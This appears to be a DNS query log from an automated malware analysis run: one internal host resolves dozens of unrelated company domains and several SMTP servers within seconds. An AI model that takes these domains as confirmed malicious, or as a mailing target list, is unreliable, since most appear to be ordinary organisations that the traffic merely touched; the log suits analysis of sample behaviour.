                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.118931055 CEST8.8.8.8192.168.2.40xdd81No error (0)clinicasanluis.com.co172.67.164.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.122026920 CEST8.8.8.8192.168.2.40xc057No error (0)impexnc.com204.11.56.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.151576042 CEST8.8.8.8192.168.2.40x9e8dNo error (0)techtrans.de185.237.66.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.183904886 CEST8.8.8.8192.168.2.40xa3f1Server failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.223901987 CEST8.8.8.8192.168.2.40x64a6Name error (3)iranytu.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.227169037 CEST8.8.8.8192.168.2.40xfe90No error (0)metaforacom.com185.42.105.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.269721985 CEST8.8.8.8192.168.2.40x14bName error (3)iranytu.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.309176922 CEST8.8.8.8192.168.2.40xf1dbServer failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.319163084 CEST8.8.8.8192.168.2.40x539Name error (3)iranytu.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.345438004 CEST8.8.8.8192.168.2.40x7235No error (0)magicomm.co.uk83.223.113.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.375080109 CEST8.8.8.8192.168.2.40x159No error (0)kewlmail.com63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.412638903 CEST8.8.8.8192.168.2.40xe27Server failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.421242952 CEST8.8.8.8192.168.2.40x713eNo error (0)pertex.com185.151.30.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.443198919 CEST8.8.8.8192.168.2.40x94caNo error (0)gydrozo.ru91.220.211.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.450576067 CEST8.8.8.8192.168.2.40xeb86No error (0)ludomemo.com27.0.174.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.535263062 CEST8.8.8.8192.168.2.40xe65fNo error (0)reproar.com194.143.194.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.599641085 CEST8.8.8.8192.168.2.40x5772No error (0)web-york.com219.94.129.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.659104109 CEST8.8.8.8192.168.2.40xfecdNo error (0)geecl.com194.76.27.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.767709970 CEST8.8.8.8192.168.2.40x762eNo error (0)stopllc.com162.241.233.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.861706018 CEST8.8.8.8192.168.2.40x86c1No error (0)msl-lock.com165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.861706018 CEST8.8.8.8192.168.2.40x86c1No error (0)msl-lock.com165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.887757063 CEST8.8.8.8192.168.2.40xc200No error (0)smtp.sbcglobal.yahoo.comsmtp-sbc.mail.yahoo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.887757063 CEST8.8.8.8192.168.2.40xc200No error (0)smtp-sbc.mail.yahoo.comsmtp1.sbc.mail.am0.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.887757063 CEST8.8.8.8192.168.2.40xc200No error (0)smtp1.sbc.mail.am0.yahoodns.net66.163.170.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.887757063 CEST8.8.8.8192.168.2.40xc200No error (0)smtp1.sbc.mail.am0.yahoodns.net67.195.12.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.887757063 CEST8.8.8.8192.168.2.40xc200No error (0)smtp1.sbc.mail.am0.yahoodns.net66.218.88.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.954567909 CEST8.8.8.8192.168.2.40xf803No error (0)doggybag.org213.186.33.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:37.110754967 CEST8.8.8.8192.168.2.40x3707No error (0)bible.org172.67.33.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:37.110754967 CEST8.8.8.8192.168.2.40x3707No error (0)bible.org104.20.54.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:37.110754967 CEST8.8.8.8192.168.2.40x3707No error (0)bible.org104.20.55.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:37.113811016 CEST8.8.8.8192.168.2.40x43cNo error (0)kumaden.com49.212.180.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:37.139394045 CEST8.8.8.8192.168.2.40x3d7No error (0)cbras.com54.39.198.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:37.311739922 CEST8.8.8.8192.168.2.40xff61No error (0)roewer.de45.142.176.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:37.330876112 CEST8.8.8.8192.168.2.40x8af2Server failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:37.410706997 CEST8.8.8.8192.168.2.40xecc6No error (0)kamptal.at128.204.134.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:37.429831028 CEST8.8.8.8192.168.2.40x176fNo error (0)alexpope.biz76.74.184.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:37.465396881 CEST8.8.8.8192.168.2.40x5129Server failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:37.506290913 CEST8.8.8.8192.168.2.40x644cName error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:37.542310953 CEST8.8.8.8192.168.2.40x3c19Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:37.582467079 CEST8.8.8.8192.168.2.40x3337Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:37.609611988 CEST8.8.8.8192.168.2.40xf302Server failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:37.705960989 CEST8.8.8.8192.168.2.40xb6c6No error (0)muhr-soehne.de5.189.171.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:37.770051003 CEST8.8.8.8192.168.2.40x2a56No error (0)t-mould.com81.169.145.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:37.826412916 CEST8.8.8.8192.168.2.40x4fa4No error (0)snf.it95.174.22.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:37.860796928 CEST8.8.8.8192.168.2.40x90b1No error (0)shztm.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:37.872946978 CEST8.8.8.8192.168.2.40x6be3No error (0)alexpope.biz76.74.184.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:37.939373970 CEST8.8.8.8192.168.2.40x4ef2No error (0)biosolve.com151.101.130.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:37.947328091 CEST8.8.8.8192.168.2.40xad2Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:37.973311901 CEST8.8.8.8192.168.2.40xf2c0Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:37.988094091 CEST8.8.8.8192.168.2.40x9b29No error (0)ossir.org51.159.3.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:38.010340929 CEST8.8.8.8192.168.2.40x77c6Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:38.147284985 CEST8.8.8.8192.168.2.40xd542No error (0)websy.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:38.147284985 CEST8.8.8.8192.168.2.40xd542No error (0)websy.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:38.372637987 CEST8.8.8.8192.168.2.40x2f71Name error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:38.415735006 CEST8.8.8.8192.168.2.40xe166Name error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:38.450419903 CEST8.8.8.8192.168.2.40x867eName error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:38.568448067 CEST8.8.8.8192.168.2.40xef77No error (0)esmoke.net204.15.134.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:38.684473991 CEST8.8.8.8192.168.2.40xbebcNo error (0)ncn.de46.30.60.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:38.737603903 CEST8.8.8.8192.168.2.40xbe20No error (0)angework.com219.94.128.87A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:38.950601101 CEST8.8.8.8192.168.2.40x2b8bNo error (0)ccssinc.com172.67.185.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:38.950601101 CEST8.8.8.8192.168.2.40x2b8bNo error (0)ccssinc.com104.21.19.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:39.015562057 CEST8.8.8.8192.168.2.40x4883Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:39.032097101 CEST8.8.8.8192.168.2.40xa8ddNo error (0)wvs-net.de188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:39.032097101 CEST8.8.8.8192.168.2.40xa8ddNo error (0)wvs-net.de188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:39.068547964 CEST8.8.8.8192.168.2.40x21fdNo error (0)shiner.com172.67.143.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:39.068547964 CEST8.8.8.8192.168.2.40x21fdNo error (0)shiner.com104.21.27.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:39.222409010 CEST8.8.8.8192.168.2.40xc4d8Server failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:39.449480057 CEST8.8.8.8192.168.2.40x5d63Server failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:39.554302931 CEST8.8.8.8192.168.2.40xe8c8No error (0)com-edit.fr63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:39.565365076 CEST8.8.8.8192.168.2.40xc666No error (0)semuk.com86.105.245.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:39.618386030 CEST8.8.8.8192.168.2.40x8d12No error (0)bggs.com35.230.155.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:39.785523891 CEST8.8.8.8192.168.2.40x2b87No error (0)cpmteam.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:39.785523891 CEST8.8.8.8192.168.2.40x2b87No error (0)cpmteam.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:39.794847965 CEST8.8.8.8192.168.2.40xc03Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:39.838746071 CEST8.8.8.8192.168.2.40x58b7No error (0)wanoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:39.838746071 CEST8.8.8.8192.168.2.40x58b7No error (0)wanoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:39.850560904 CEST8.8.8.8192.168.2.40x6616No error (0)simetar.com104.21.79.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:39.850560904 CEST8.8.8.8192.168.2.40x6616No error (0)simetar.com172.67.146.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:39.910233021 CEST8.8.8.8192.168.2.40xe26dServer failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:40.031459093 CEST8.8.8.8192.168.2.40x4883Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:40.119609118 CEST8.8.8.8192.168.2.40xcb9cNo error (0)kevyt.net172.67.129.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:40.119609118 CEST8.8.8.8192.168.2.40xcb9cNo error (0)kevyt.net104.21.2.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:40.308738947 CEST8.8.8.8192.168.2.40x6541No error (0)scintel.com23.239.201.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:40.405453920 CEST8.8.8.8192.168.2.40x971eNo error (0)fifa-ews.com104.21.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:40.405453920 CEST8.8.8.8192.168.2.40x971eNo error (0)fifa-ews.com172.67.189.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:40.478355885 CEST8.8.8.8192.168.2.40xe139No error (0)webways.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:40.478355885 CEST8.8.8.8192.168.2.40xe139No error (0)webways.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:40.635720015 CEST8.8.8.8192.168.2.40x945fNo error (0)refintl.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:40.635720015 CEST8.8.8.8192.168.2.40x945fNo error (0)refintl.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:40.635720015 CEST8.8.8.8192.168.2.40x945fNo error (0)refintl.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:40.635720015 CEST8.8.8.8192.168.2.40x945fNo error (0)refintl.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:40.678683996 CEST8.8.8.8192.168.2.40xac72No error (0)www.fnsds.orgcomingsoon.namebright.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:40.678683996 CEST8.8.8.8192.168.2.40xac72No error (0)comingsoon.namebright.comcdl-lb-1356093980.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:40.678683996 CEST8.8.8.8192.168.2.40xac72No error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com34.224.178.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:40.678683996 CEST8.8.8.8192.168.2.40xac72No error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com54.165.108.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:40.681103945 CEST8.8.8.8192.168.2.40x7c1eName error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:40.706650019 CEST8.8.8.8192.168.2.40xdd24Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:40.747214079 CEST8.8.8.8192.168.2.40xe8b5Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:40.793298960 CEST8.8.8.8192.168.2.40x5f4cNo error (0)daytonir.com104.18.40.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:40.793298960 CEST8.8.8.8192.168.2.40x5f4cNo error (0)daytonir.com172.64.147.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:40.846915007 CEST8.8.8.8192.168.2.40xc47fServer failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:40.859055042 CEST8.8.8.8192.168.2.40xc03Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:40.896724939 CEST8.8.8.8192.168.2.40xbb7aNo error (0)kavram.com172.67.189.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:40.896724939 CEST8.8.8.8192.168.2.40xbb7aNo error (0)kavram.com104.21.89.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:41.025930882 CEST8.8.8.8192.168.2.40xc47fServer failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:41.059422970 CEST8.8.8.8192.168.2.40x2112No error (0)listel.co.jp49.212.243.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:41.061954021 CEST8.8.8.8192.168.2.40x4883Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:41.211147070 CEST8.8.8.8192.168.2.40xa9adNo error (0)reproar.com194.143.194.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:41.300035000 CEST8.8.8.8192.168.2.40x7cd9No error (0)yhsll.com102.134.49.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:41.300489902 CEST8.8.8.8192.168.2.40xf56bNo error (0)www.reglera.comreglera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:41.300489902 CEST8.8.8.8192.168.2.40xf56bNo error (0)reglera.com64.125.133.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:41.323309898 CEST8.8.8.8192.168.2.40xa679No error (0)gbmfg.com151.101.2.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:41.323309898 CEST8.8.8.8192.168.2.40xa679No error (0)gbmfg.com151.101.66.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:41.323309898 CEST8.8.8.8192.168.2.40xa679No error (0)gbmfg.com151.101.130.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:41.323309898 CEST8.8.8.8192.168.2.40xa679No error (0)gbmfg.com151.101.194.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:41.366694927 CEST8.8.8.8192.168.2.40x7685No error (0)www.pohlfood.compohlfood.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:41.366694927 CEST8.8.8.8192.168.2.40x7685No error (0)pohlfood.com104.218.10.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:41.409847021 CEST8.8.8.8192.168.2.40xb2efNo error (0)mijash3.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:41.409847021 CEST8.8.8.8192.168.2.40xb2efNo error (0)mijash3.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:41.409847021 CEST8.8.8.8192.168.2.40xb2efNo error (0)mijash3.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:41.409847021 CEST8.8.8.8192.168.2.40xb2efNo error (0)mijash3.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:41.422766924 CEST8.8.8.8192.168.2.40xfb8bServer failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:41.448095083 CEST8.8.8.8192.168.2.40x775dNo error (0)atbauk.org172.67.196.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:41.448095083 CEST8.8.8.8192.168.2.40x775dNo error (0)atbauk.org104.21.92.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:41.492053986 CEST8.8.8.8192.168.2.40xb35dNo error (0)fifa-ews.com104.21.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:41.492053986 CEST8.8.8.8192.168.2.40xb35dNo error (0)fifa-ews.com172.67.189.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:41.503216028 CEST8.8.8.8192.168.2.40x3cf8No error (0)shanks.co.uk217.19.254.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:41.583810091 CEST8.8.8.8192.168.2.40x7058No error (0)sanfotek.net216.69.141.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:41.720549107 CEST8.8.8.8192.168.2.40x4519No error (0)biurohera.pl79.96.161.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:41.720549107 CEST8.8.8.8192.168.2.40x4519No error (0)biurohera.pl54.36.175.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:41.754374981 CEST8.8.8.8192.168.2.40xfd8fNo error (0)calvinly.com216.239.32.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:41.754374981 CEST8.8.8.8192.168.2.40xfd8fNo error (0)calvinly.com216.239.36.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:41.754374981 CEST8.8.8.8192.168.2.40xfd8fNo error (0)calvinly.com216.239.38.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:41.754374981 CEST8.8.8.8192.168.2.40xfd8fNo error (0)calvinly.com216.239.34.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:41.844294071 CEST8.8.8.8192.168.2.40xc47fServer failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:41.894862890 CEST8.8.8.8192.168.2.40xc03Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:42.184900999 CEST8.8.8.8192.168.2.40x54afNo error (0)www.muhr-soehne.de5.189.171.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:42.204477072 CEST8.8.8.8192.168.2.40x3047No error (0)mail.airmail.net66.226.70.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:42.426120043 CEST8.8.8.8192.168.2.40x807cNo error (0)4locals.net80.82.115.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:42.478271961 CEST8.8.8.8192.168.2.40xe10aNo error (0)gbp-jp.com208.80.123.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:42.478271961 CEST8.8.8.8192.168.2.40xe10aNo error (0)gbp-jp.com208.80.123.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:42.478271961 CEST8.8.8.8192.168.2.40xe10aNo error (0)gbp-jp.com208.80.122.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:42.478271961 CEST8.8.8.8192.168.2.40xe10aNo error (0)gbp-jp.com208.80.122.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:42.504467010 CEST8.8.8.8192.168.2.40x8d5dNo error (0)sanfotek.net216.69.141.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:42.529258966 CEST8.8.8.8192.168.2.40xe015No error (0)uhsa.edu.ag192.124.249.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:42.563416004 CEST8.8.8.8192.168.2.40xef7bNo error (0)kamptal.at128.204.134.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:42.744415045 CEST8.8.8.8192.168.2.40xe404No error (0)www.11tochi.net157.112.176.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:42.762936115 CEST8.8.8.8192.168.2.40x794bNo error (0)fr-dat.com127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:43.102442980 CEST8.8.8.8192.168.2.40xe899No error (0)a-domani.com183.90.232.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:43.114526987 CEST8.8.8.8192.168.2.40x4883Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:43.300060987 CEST8.8.8.8192.168.2.40xd06fNo error (0)cvswl.org188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:43.300060987 CEST8.8.8.8192.168.2.40xd06fNo error (0)cvswl.org188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:43.361084938 CEST8.8.8.8192.168.2.40x9419No error (0)nolaoig.org54.212.145.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:43.568505049 CEST8.8.8.8192.168.2.40xe585No error (0)ludea.cz46.8.8.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:43.591202021 CEST8.8.8.8192.168.2.40x4c92No error (0)orbitgas.com107.180.58.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:43.703447104 CEST8.8.8.8192.168.2.40x97f3No error (0)www.pb-games.compb-games.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:43.703447104 CEST8.8.8.8192.168.2.40x97f3No error (0)pb-games.com173.254.28.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:43.741691113 CEST8.8.8.8192.168.2.40x5263Name error (3)www.yumgiskor.kznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:43.804708958 CEST8.8.8.8192.168.2.40xe493No error (0)usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:43.923787117 CEST8.8.8.8192.168.2.40xc03Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:44.002111912 CEST8.8.8.8192.168.2.40x2af4Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:44.023277044 CEST8.8.8.8192.168.2.40x2af4Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
